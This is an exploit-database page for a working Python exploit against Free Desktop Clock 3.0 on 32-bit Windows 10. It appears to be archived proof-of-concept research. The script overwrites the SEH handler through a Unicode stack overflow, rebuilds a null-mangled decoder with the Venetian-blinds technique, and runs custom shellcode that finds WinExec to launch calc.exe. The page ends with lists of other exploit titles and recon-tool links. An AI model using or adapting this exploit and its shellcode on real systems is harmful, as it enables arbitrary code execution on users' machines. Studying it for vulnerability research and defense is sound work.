"Free Desktop Clock x86 Venetian Blinds Zipper 3.0 - Unicode Stack Overflow (SEH)"

Author

Exploit author

boku

Platform

Exploit platform

windows

Release date

Exploit published date

2020-04-13

                
                    
                         Download file
                    
                
            
# Exploit Title: Free Desktop Clock x86 Venetian Blinds Zipper 3.0 - Unicode Stack Overflow (SEH)
# Exploit Author: Bobby Cooke
# Date: 2020-04-11
# Vendor: Drive Software Company
# Vendor Site: http://www.drive-software.com
# Software Download: http://www.drive-software.com/download/freeclock.exe
# Tested On: Windows 10 - Pro 1909 (x86) & Home 1909 (x86)
# - Does not work on x64 version
# Version: Free Desktop Clock 3.0
# Recreate: Install & Open > Time Zones > 'Enter display name' textbox > paste buffer

############################### CRASH INFO ###############################
# [!] Access violation
#   042D15E7        8908       mov [eax], ecx  ; FreeDesk.00440044
# SEH chain of main thread
#   Address    SE handler
#   0014EE24   FreeDesk.00410041 <- Structured Exception Handler Overwrite
#   00410041   74737953
#   69620C00   *** CORRUPT ENTRY ***
############################### CRASH INFO ###############################

File    = 'poc.txt'

######################### EXPLOIT ENVIRONMENT INFO #########################
#badChars  = '\x00\x0d\x80\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8e'
#badChars += '\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9e\x9f'
#goodChars = '\x81\x8D\x8F\x90\x9D' (within 0x80-0x9f)

# Base       | Rebase | SafeSEH | ASLR  | NXCompat | Modulename
# 0x00400000 | False  | False   | False |  False   | [FreeDesktopClock.exe] 
# 0x042b0000 | True   | False   | False |  False   | [Clock.dll] 
######################### EXPLOIT ENVIRONMENT INFO #########################

os_nSEH = '\x41'*(457) # Offset to nSEH Overwrite
nSEH    = '\xeb\x05'   # jmp short +2
SEH     = '\xeb\x43'   # 0x004300eb: pop esi# pop ebx# ret [FreeDesktopClock.exe] 
# nSEH & SEH translated opcodes after Pop-Pop-Ret
#   EB 00                   jmp short +2
#   05 00EB0043             add eax, 4300EB00

# GetPC to decode our decoder using Venetian Blinds technique
getPC   = '\x73'   # add [ebx], dh   # nop | [EBX] = writable memory 
getPC  += '\x61'   # popad           # [ESP] = &Payload
getPC  += '\x72'   # add [edx], dh   # realigns execution for 1 byte opcodes

ebx2eax  = '\x58'  # pop eax         # EAX = &Payload
ebx2eax += '\x72'  # add [edx], dh

# Use Venetian Blinds technique to fix our mangled decoder
# + Using the Venetian Blinds Technique costs 14 bytes to fill 1 0x00 with 1 legit shellcode byte. 
#   
# Ajust EAX to &Decoder
getDecoder  = '\x05\x13\x11' # add eax, 0x11001300 # EAX + 512-bytes
getDecoder += '\x72'         # add [edx], dh
getDecoder += '\x2D\x11\x11' # sub eax, 0x11001100 # EAX = &Decoder
getDecoder += '\x72'         # add [edx], dh
getDecoder += '\x50'         # push eax            # [ESP] = &Decoder
getDecoder += '\x72'         # add [edx], dh

############################# ZIPPER DECODER ###############################
# Set EAX = First non-null byte of shellcode
# init:
# 1     |   50          |  push eax     # EAX = &Shellcode
# 2     |   5F          |  pop edi      # EDI = Decoder Destination Base Address
# 3     |   47          |  inc edi      # First 0x00 byte of shellcode
# 4:5   |   33D2        |  xor edx, edx
# 6:7   |   33C9        |  xor ecx, ecx
# 8:11  |   66:B9 1004  |  mov cx, 410  # ECX = Loop Counter
# decodeLoop:
# 12:13 |   33DB        |  xor ebx, ebx
# 14    |   42          |  inc edx       # EDX+EAX = &SourceShellcodeByte 
# 15    |   42          |  inc edx       # increment to next non-null byte
# 16:17 |   32DB        |  xor bl, bl    # clear BL to hold next shellcode byte
# 18:20 |   021C10      |  add bl, [eax+edx] # BL = SourceShellcodeByte
# 21:22 |   203F        |  and [edi], bh # [EDI] = SC-byte, clear with: AND 0x00
# 23:24 |   301F        |  xor [edi], bl # Write next byte of shellcode
# 25    |   47          |  inc edi
# 26    |   49          |  dec ecx
# 27:28 |   74 02       |  je short jmp2code
# 29:30 |   ^ EB ED     |  jmp short decodeLoop
# jmp2code:   
# 31    |   50          |  push eax
# 32    |   C3          |  ret
################################################3###########################

#DecoderHex  = '505F4733D233C966B9100433DB424232DB021C10203F301F47497402EBED50C3' 
firstHalf   = '\x50\x47\xD2\xC9\xB9\x04\xDB\x42\xDB\x1C\x20\x30\x47\x74\xEB\x50' 
#venBldHalf = '5F 33 33 66 10 33 42 32 02 10 3F 1F 49 02 ED C3' 
#               2  4  6  8 10 12 14 16 18 20 22 24 26 28 30 32 

# Note: These nop unicode instructions are actually [reg+0x00] not [reg]
# The [reg] version (0032) is 2 bytes. The [reg+0x00] version (007200) is 3 bytes 
# Use the 3 byte version for Venetian Blinds alignment
    # Example:
    #    nasm > add [edx], dh
    #   00000000  0032              add [edx],dh
    #   nasm > add [edx+00], dh
    #   00000000  0032              add [edx],dh
    #   nasm > add [edx+01], dh
    #   00000000  007201            add [edx+0x1],dh
    # + This happens when typing in ASM commands into msf-nasm_shell and immunity

## 2nd byte - \x00 => \x5F
venBlinds   = '\x40'         #   inc eax           // now eax points shellcode byte
venBlinds  += '\x72'         #   add [edx], dh     // nop to realign opcode execution
venBlinds  += '\xC6\x5F'     #   mov byte [eax], 0x50
venBlinds  += '\x72'         #   add [edx], dh     // nop to realign opcode execution
venBlinds  += '\x40'         #   inc eax           // now eax points shellcode byte
venBlinds  += '\x72'         #   add [edx], dh     // nop to realign opcode execution
venBlinds  += '\x40'         #   inc eax           // now eax points to the next '\x00'
venBlinds  += '\x72'         #   add [edx], dh     // nop to realign opcode execution
## 4th byte - \x00 => \x33
venBlinds  += '\xC6\x33'     #   mov byte [eax], 0x33
venBlinds  += '\x72'         #   add [edx], dh     // nop to realign opcode execution
venBlinds  += '\x40'         #   inc eax           // now eax points shellcode byte
venBlinds  += '\x72'         #   add [edx], dh     // nop to realign opcode execution
venBlinds  += '\x40'         #   inc eax           // now eax points to the next '\x00'
venBlinds  += '\x72'         #   add [edx], dh     // nop to realign opcode execution
## 6th byte - \x00 => \x33
venBlinds  += '\xC6\x33'     #   mov byte [eax], 0x33
venBlinds  += '\x72'         #   add [edx], dh     // nop to realign opcode execution
venBlinds  += '\x40'         #   inc eax           // now eax points shellcode byte
venBlinds  += '\x72'         #   add [edx], dh     // nop to realign opcode execution
venBlinds  += '\x40'         #   inc eax           // now eax points to the next '\x00'
venBlinds  += '\x72'         #   add [edx], dh     // nop to realign opcode execution
## 8th byte - \x00 => \x66
venBlinds  += '\xC6\x66'     #   mov byte [eax], 0x66
venBlinds  += '\x72'         #   add [edx], dh     // nop to realign opcode execution
venBlinds  += '\x40'         #   inc eax           // now eax points shellcode byte
venBlinds  += '\x72'         #   add [edx], dh     // nop to realign opcode execution
venBlinds  += '\x40'         #   inc eax           // now eax points to the next '\x00'
venBlinds  += '\x72'         #   add [edx], dh     // nop to realign opcode execution
## 10th byte - \x00 => \x10
venBlinds  += '\xC6\x10'     #   mov byte [eax], 0x10
venBlinds  += '\x72'         #   add [edx], dh     // nop to realign opcode execution
venBlinds  += '\x40'         #   inc eax           // now eax points shellcode byte
venBlinds  += '\x72'         #   add [edx], dh     // nop to realign opcode execution
venBlinds  += '\x40'         #   inc eax           // now eax points to the next '\x00'
venBlinds  += '\x72'         #   add [edx], dh     // nop to realign opcode execution
## 12th byte - \x00 => \x33
venBlinds  += '\xC6\x33'     #   mov byte [eax], 0x33
venBlinds  += '\x72'         #   add [edx], dh     // nop to realign opcode execution
venBlinds  += '\x40'         #   inc eax           // now eax points shellcode byte
venBlinds  += '\x72'         #   add [edx], dh     // nop to realign opcode execution
venBlinds  += '\x40'         #   inc eax           // now eax points to the next '\x00'
venBlinds  += '\x72'         #   add [edx], dh     // nop to realign opcode execution
## 14th byte - \x00 => \x42
venBlinds  += '\xC6\x42'     #   mov byte [eax], 0x42
venBlinds  += '\x72'         #   add [edx], dh     // nop to realign opcode execution
venBlinds  += '\x40'         #   inc eax           // now eax points shellcode byte
venBlinds  += '\x72'         #   add [edx], dh     // nop to realign opcode execution
venBlinds  += '\x40'         #   inc eax           // now eax points to the next '\x00'
venBlinds  += '\x72'         #   add [edx], dh     // nop to realign opcode execution
## 16th byte - \x00 => \x32
venBlinds  += '\xC6\x32'     #   mov byte [eax], 0x32
venBlinds  += '\x72'         #   add [edx], dh     // nop to realign opcode execution
venBlinds  += '\x40'         #   inc eax           // now eax points shellcode byte
venBlinds  += '\x72'         #   add [edx], dh     // nop to realign opcode execution
venBlinds  += '\x40'         #   inc eax           // now eax points to the next '\x00'
venBlinds  += '\x72'         #   add [edx], dh     // nop to realign opcode execution
## 18th byte - \x00 => \x02
venBlinds  += '\xC6\x02'     #   mov byte [eax], 0x02
venBlinds  += '\x72'         #   add [edx], dh     // nop to realign opcode execution
venBlinds  += '\x40'         #   inc eax           // now eax points shellcode byte
venBlinds  += '\x72'         #   add [edx], dh     // nop to realign opcode execution
venBlinds  += '\x40'         #   inc eax           // now eax points to the next '\x00'
venBlinds  += '\x72'         #   add [edx], dh     // nop to realign opcode execution
## 20th byte - \x00 => \x10
venBlinds  += '\xC6\x10'     #   mov byte [eax], 0x10
venBlinds  += '\x72'         #   add [edx], dh     // nop to realign opcode execution
venBlinds  += '\x40'         #   inc eax           // now eax points shellcode byte
venBlinds  += '\x72'         #   add [edx], dh     // nop to realign opcode execution
venBlinds  += '\x40'         #   inc eax           // now eax points to the next '\x00'
venBlinds  += '\x72'         #   add [edx], dh     // nop to realign opcode execution
## 22nd byte - \x00 => \x3F
venBlinds  += '\xC6\x3F'     #   mov byte [eax], 0x3F
venBlinds  += '\x72'         #   add [edx], dh     // nop to realign opcode execution
venBlinds  += '\x40'         #   inc eax           // now eax points shellcode byte
venBlinds  += '\x72'         #   add [edx], dh     // nop to realign opcode execution
venBlinds  += '\x40'         #   inc eax           // now eax points to the next '\x00'
venBlinds  += '\x72'         #   add [edx], dh     // nop to realign opcode execution
## 24nd byte - \x00 => \x1F
venBlinds  += '\xC6\x1F'     #   mov byte [eax], 0x1F
venBlinds  += '\x72'         #   add [edx], dh     // nop to realign opcode execution
venBlinds  += '\x40'         #   inc eax           // now eax points shellcode byte
venBlinds  += '\x72'         #   add [edx], dh     // nop to realign opcode execution
venBlinds  += '\x40'         #   inc eax           // now eax points to the next '\x00'
venBlinds  += '\x72'         #   add [edx], dh     // nop to realign opcode execution
## 26th byte - \x00 => \x49
venBlinds  += '\xC6\x49'     #   mov byte [eax], 0x49
venBlinds  += '\x72'         #   add [edx], dh     // nop to realign opcode execution
venBlinds  += '\x40'         #   inc eax           // now eax points shellcode byte
venBlinds  += '\x72'         #   add [edx], dh     // nop to realign opcode execution
venBlinds  += '\x40'         #   inc eax           // now eax points to the next '\x00'
venBlinds  += '\x72'         #   add [edx], dh     // nop to realign opcode execution
## 28th byte - \x00 => \x02
venBlinds  += '\xC6\x02'     #   mov byte [eax], 0x02
venBlinds  += '\x72'         #   add [edx], dh     // nop to realign opcode execution
venBlinds  += '\x40'         #   inc eax           // now eax points shellcode byte
venBlinds  += '\x72'         #   add [edx], dh     // nop to realign opcode execution
venBlinds  += '\x40'         #   inc eax           // now eax points to the next '\x00'
venBlinds  += '\x72'         #   add [edx], dh     // nop to realign opcode execution
## 30th byte - \x00 => \xED
venBlinds  += '\xC6\xED'     #   mov byte [eax], 0xED
venBlinds  += '\x72'         #   add [edx], dh     // nop to realign opcode execution
venBlinds  += '\x40'         #   inc eax           // now eax points shellcode byte
venBlinds  += '\x72'         #   add [edx], dh     // nop to realign opcode execution
venBlinds  += '\x40'         #   inc eax           // now eax points to the next '\x00'
venBlinds  += '\x72'         #   add [edx], dh     // nop to realign opcode execution
## 32nd byte - \x00 => \xC3
venBlinds  += '\xC6\xC3'     #   mov byte [eax], 0xC3
venBlinds  += '\x72'         #   add [edx], dh
venBlinds  += '\x40'         #   inc eax          // now eax points shellcode byte
venBlinds  += '\x72'         #   add [edx], dh
# Jump to the decoded decoder by Returning to the address we saved on the stack
venBlinds  += '\xC3'         #   ret  [!] Now we are executing the decoder!

os_decoder   = '\x90'*((512/2)-len(nSEH+SEH+getPC+ebx2eax+getDecoder+venBlinds))

#badChars  = 00 0d 80 82->8e 91->9f
# Custom PopCalc shellcode that avoids the bad characters
fKernel32  = '\x33\xF6'         # xor esi, esi
fKernel32 += '\xF7\xE6'         # mul esi
fKernel32 += '\x64\x03\x52\x30' # add edx, fs:[edx+30]   # EBX = Address_of_PEB
fKernel32 += '\x03\x42\x0C'     # add eax, [edx+C]       # EBX = Address_of_LDR
fKernel32 += '\x03\x70\x1C'     # add esi, [eax+1C]      # ESI =  1st entry in InitOrderModuleList / ntdll.dll
fKernel32 += '\xAD'             # lodsd                  # EAX = 2nd entry in InitOrderModuleList / kernelbase.dll
fKernel32 += '\x50'             # push eax
fKernel32 += '\x5E'             # pop esi
fKernel32 += '\xAD'             # lodsd                  # EAX = 3rd entry in InitOrderModuleList / kernel32.dll
fKernel32 += '\xFF\x70\x08'     # push dword ptr [eax+8] # [ESP] = &kernel32

gExpotTbl  = '\x33\xC9'         # xor ecx, ecx
gExpotTbl += '\x33\xF6'         # xor esi, esi
gExpotTbl += '\x33\xDB'         # xor ebx, ebx
gExpotTbl += '\xF7\xE3'         # mul ebx
gExpotTbl += '\x58'             # pop eax                #  EAX  = &kernel32
gExpotTbl += '\x50'             # push eax               # [ESP] = &kernel32
gExpotTbl += '\x03\x70\x3C'     # add esi, [eax+0x3C] ; ESI = RVA NewEXEHeader
gExpotTbl += '\x03\xF0'         # add esi, eax        ; ESI = &NewEXEHeader
gExpotTbl += '\x03\x56\x78'     # add edx, [esi+0x78] ; EDX = RVA ExportTable
gExpotTbl += '\x03\xD0'         # add edx, eax        ; EDX = &ExportTable = 763477B0

gExpotTbl += '\x03\x5A\x20' # add ebx, [edx+0x20] ; EBX = RVA ExportNameTable
gExpotTbl += '\x03\xD8'     # add ebx, eax        ; EBX = &ExportNameTable

gExpotTbl += '\x03\x4A\x24' # add ecx, [edx+0x24] ; ECX = RVA ExportOrdinalTable
gExpotTbl += '\x03\xC8'     # add ecx, eax        ; ECX = &ExportOrdinalTable
gExpotTbl += '\x51'         # push ecx

gExpotTbl += '\x33\xFF'     # xor edi, edi
gExpotTbl += '\x03\x7A\x1C' # add edi, [edx+0x1C] ; EDI = RVA ExportAddrTable
gExpotTbl += '\x03\xF8'     # add edi, eax        ; EDI = &ExportAddrTable
gExpotTbl += '\x57'         # push edi

fWinExec   = '\x68\x57\x69\x6E\x45' # push 0x456E6957 ; EniW
fWinExec  += '\x33\xC0'     # xor eax, eax    ; EAX = Counter

fWinExec  += '\x33\xF6'     # xor esi, esi
fWinExec  += '\x03\xF4'     # add esi, esp  ; ESI = "WinE"
fWinExec  += '\xFC'         # cld           ; Process strings left to right
fWinExec  += '\x50'         # push eax
fWinExec  += '\x33\xC9'     # xor ecx, ecx
fWinExec  += '\x41'         # inc ecx
fWinExec  += '\x41'         # inc ecx
fWinExec  += '\x41'         # inc ecx
fWinExec  += '\x41'         # inc ecx
fWinExec  += '\xF7\xE1'     # mul ecx
fWinExec  += '\x33\xFF'     # xor edi, edi
fWinExec  += '\x03\x3C\x18' # add edi, [eax+ebx] 
fWinExec  += '\x58'         # pop eax
fWinExec  += '\x03\x7C\x24\x0C' # add edi, [esp+0xC]   ; EDI = &NthNameString
fWinExec  += '\xF3\xA6'     # repe cmpsb           ; compare [&NthNameString] to "WinExec"
fWinExec  += '\x74\x03'     # jz found             ; If [&NthNameString] == "WinExec" end loop
fWinExec  += '\x40'         # inc eax              ; Counter ++
fWinExec  += '\xEB\xE1'     # jmp short searchLoop ; restart loop

fWinExec  += '\x33\xC9'     # xor ecx, ecx
fWinExec  += '\x41'         # inc ecx
fWinExec  += '\x41'         # inc ecx
fWinExec  += '\xF7\xE1'     # mul ecx
fWinExec  += '\x33\xC9'     # xor ecx, ecx
fWinExec  += '\x03\x4C\x24\x08' # add ecx, [esp+0x8] ; ECX = &ExportOrdinalTable
fWinExec  += '\x03\xC8'     # add ecx, eax
fWinExec  += '\x33\xC0'     # xor eax, eax
fWinExec  += '\x66\x03\x01' # add ax, [ecx]      ;  AX = ordinalNumber

fWinExec  += '\x33\xC9'         # xor ecx, ecx
fWinExec  += '\x41\x41\x41\x41' # inc ecx X 4
fWinExec  += '\xF7\xE1'         # mul ecx
fWinExec  += '\xFF\x74\x24\x04' # push dword [esp+0x4]
fWinExec  += '\x01\x04\x24'     # add [esp], eax
fWinExec  += '\x5A'             # pop edx
fWinExec  += '\x33\xDB'         # xor ebx, ebx
fWinExec  += '\x03\x1A'         # add ebx, [edx] ; EBX = RVA WinExec
fWinExec  += '\x03\x5C\x24\x0C' # add ebx, [esp+0xC]     ; EBX = &WinExec
# Call WinExec( CmdLine, ShowState );
#   CmdLine   = "calc.exe"
#   ShowState = 0x00000001 = SW_SHOWNORMAL - displays a window
callWinExec  = '\x33\xC9'       # xor ecx, ecx    ; clear eax register
callWinExec += '\x51'         # push ecx        ; string terminator 0x00 for "calc.exe" string
callWinExec += '\x68\x2E\x65\x78\x65' # push 0x6578652e ; exe. : 6578652e
callWinExec += '\x68\x63\x61\x6C\x63' # push 0x636c6163 ; clac : 636c6163
callWinExec += '\x33\xC0'       # xor eax, eax
callWinExec += '\x03\xC4'       # add eax, esp    ; save pointer to "calc.exe" string in eax
callWinExec += '\x41'         # inc ecx         ; uCmdShow SW_SHOWNORMAL = 0x00000001
callWinExec += '\x51'         # push ecx        ; uCmdShow  - push 0x1 to stack # 2nd argument
callWinExec += '\x50'         # push eax        ; lpcmdLine - push string address stack # 1st argument
callWinExec += '\xFF\xD3'       # call ebx        ; Call the WinExec Function

shellcode = fKernel32+gExpotTbl+fWinExec+callWinExec

buffer      = os_nSEH+nSEH+SEH+getPC+ebx2eax+getDecoder+venBlinds+os_decoder+firstHalf+shellcode
filler      = '\x77'*(9000-len(buffer))
buffer      = buffer+filler

try:
    payload   = buffer
    f         = open(File, 'w')
    f.write(payload)
    f.close()
    print File + " created successfully"
except:
    print File + ' failed to create'

Release Date	Title	Type	Platform	Author
2020-12-02	"aSc TimeTables 2021.6.2 - Denial of Service (PoC)"	local	windows	"Ismael Nava"
2020-12-02	"Anuko Time Tracker 1.19.23.5311 - No rate Limit on Password Reset functionality"	webapps	php	"Mufaddal Masalawala"
2020-12-02	"Ksix Zigbee Devices - Playback Protection Bypass (PoC)"	remote	multiple	"Alejandro Vazquez Vazquez"
2020-12-02	"Mitel mitel-cs018 - Call Data Information Disclosure"	remote	linux	"Andrea Intilangelo"
2020-12-02	"Artworks Gallery 1.0 - Arbitrary File Upload RCE (Authenticated) via Edit Profile"	webapps	multiple	"Shahrukh Iqbal Mirza"
2020-12-02	"ChurchCRM 4.2.0 - CSV/Formula Injection"	webapps	multiple	"Mufaddal Masalawala"
2020-12-02	"DotCMS 20.11 - Stored Cross-Site Scripting"	webapps	multiple	"Hardik Solanki"
2020-12-02	"ChurchCRM 4.2.1 - Persistent Cross Site Scripting (XSS)"	webapps	multiple	"Mufaddal Masalawala"
2020-12-02	"NewsLister - Authenticated Persistent Cross-Site Scripting"	webapps	multiple	"Emre Aslan"
2020-12-02	"IDT PC Audio 1.0.6433.0 - 'STacSV' Unquoted Service Path"	local	windows	"Manuel Alvarez"

Release Date	Title	Type	Platform	Author
2020-12-02	"aSc TimeTables 2021.6.2 - Denial of Service (PoC)"	local	windows	"Ismael Nava"
2020-12-02	"IDT PC Audio 1.0.6433.0 - 'STacSV' Unquoted Service Path"	local	windows	"Manuel Alvarez"
2020-12-02	"PRTG Network Monitor 20.4.63.1412 - 'maps' Stored XSS"	webapps	windows	"Amin Rawah"
2020-12-02	"Microsoft Windows - Win32k Elevation of Privilege"	local	windows	nu11secur1ty
2020-12-01	"Global Registration Service 1.0.0.3 - 'GREGsvc.exe' Unquoted Service Path"	local	windows	"Emmanuel Lujan"
2020-12-01	"Pearson Vue VTS 2.3.1911 Installer - VUEApplicationWrapper Unquoted Service Path"	local	windows	Jok3r
2020-12-01	"Intel(r) Management and Security Application 5.2 - User Notification Service Unquoted Service Path"	local	windows	"Metin Yunus Kandemir"
2020-12-01	"10-Strike Network Inventory Explorer 8.65 - Buffer Overflow (SEH)"	local	windows	Sectechs
2020-12-01	"EPSON Status Monitor 3 'EPSON_PM_RPCV4_06' - Unquoted Service Path"	local	windows	SamAlucard
2020-11-30	"YATinyWinFTP - Denial of Service (PoC)"	remote	windows	strider

Release Date	Title	Type	Platform	Author
2020-11-27	"House Rental 1.0 - 'keywords' SQL Injection"	webapps	php	boku
2020-09-29	"CloudMe 1.11.2 - Buffer Overflow ROP (DEP_ASLR)"	local	windows	boku
2020-09-15	"Tailor MS 1.0 - Reflected Cross-Site Scripting"	webapps	php	boku
2020-09-03	"BarracudaDrive v6.5 - Insecure Folder Permissions"	local	windows	boku
2020-09-02	"Stock Management System 1.0 - Cross-Site Request Forgery (Change Username)"	webapps	php	boku
2020-08-13	"GetSimple CMS Plugin Multi User 1.8.2 - Cross-Site Request Forgery (Add Admin)"	webapps	php	boku
2020-08-10	"Warehouse Inventory System 1.0 - Cross-Site Request Forgery (Change Admin Password)"	webapps	php	boku
2020-07-26	"LibreHealth 2.0.0 - Authenticated Remote Code Execution"	webapps	php	boku
2020-07-26	"Online Course Registration 1.0 - Unauthenticated Remote Code Execution"	webapps	php	boku
2020-06-16	"Bandwidth Monitor 3.9 - 'Svc10StrikeBandMontitor' Unquoted Service Path"	local	windows	boku
2020-06-10	"10-Strike Bandwidth Monitor 3.9 - Buffer Overflow (SEH_DEP_ASLR)"	local	windows	boku
2020-05-22	"Gym Management System 1.0 - Unauthenticated Remote Code Execution"	webapps	php	boku
2020-05-07	"Pisay Online E-Learning System 1.0 - Remote Code Execution"	webapps	php	boku
2020-05-01	"Online Scheduling System 1.0 - Authentication Bypass"	webapps	php	boku
2020-05-01	"ChemInv 1.0 - Authenticated Persistent Cross-Site Scripting"	webapps	php	boku
2020-05-01	"Online Scheduling System 1.0 - Persistent Cross-Site Scripting"	webapps	php	boku
2020-04-20	"Atomic Alarm Clock x86 6.3 - 'AtomicAlarmClock' Unquoted Service Path"	local	windows	boku
2020-04-20	"Atomic Alarm Clock 6.3 - Stack Overflow (Unicode+SEH)"	local	windows	boku
2020-04-13	"Free Desktop Clock x86 Venetian Blinds Zipper 3.0 - Unicode Stack Overflow (SEH)"	local	windows	boku
2020-02-17	"DHCP Turbo 4.61298 - 'DHCP Turbo 4' Unquoted Service Path"	local	windows	boku
2020-02-17	"TFTP Turbo 4.6.1273 - 'TFTP Turbo 4' Unquoted Service Path"	local	windows	boku
2020-02-17	"Cuckoo Clock v5.0 - Buffer Overflow"	local	windows	boku
2020-02-17	"BOOTP Turbo 2.0.1214 - 'BOOTP Turbo' Unquoted Service Path"	local	windows	boku
2020-02-14	"SprintWork 2.3.1 - Local Privilege Escalation"	local	windows	boku
2020-02-14	"HomeGuard Pro 9.3.1 - Insecure Folder Permissions"	local	windows	boku
2020-02-13	"OpenTFTP 1.66 - Local Privilege Escalation"	local	windows	boku
2020-02-11	"FreeSSHd 1.3.1 - 'FreeSSHDService' Unquoted Service Path"	local	windows	boku
2020-02-11	"Disk Sorter Enterprise 12.4.16 - 'Disk Sorter Enterprise' Unquoted Service Path"	local	windows	boku
2020-02-11	"freeFTPd v1.0.13 - 'freeFTPdService' Unquoted Service Path"	local	windows	boku
2020-02-11	"Torrent iPod Video Converter 1.51 - Stack Overflow"	local	windows	boku

import requests

response = requests.get('http://127.0.0.1:8181?format=json')

For full documentation follow the link above

Cipherscan. Find out which SSL ciphersuites are supported by a target.

Cipher	Protocols	Sigalg	Trusted

Identify and fingerprint Web Application Firewall (WAF) products protecting a website.

Host	WAF detected

Whatweb

Dns lookup

Raccoon scanner

Cmseek

WAF detector

DNS reconnaince

Bing IP2Host

Wappalyzer

Waybackurl

HostHunter

WPScan

Apache Users

CORS Scanner

API Docs

ReDoc

OpenAPI

Swagger

Search for hundreds of thousands of exploits

"Free Desktop Clock x86 Venetian Blinds Zipper 3.0 - Unicode Stack Overflow (SEH)"

Download file

Cipherscan. Find out which SSL ciphersuites are supported by a target.

Identify and fingerprint Web Application Firewall (WAF) products protecting a website.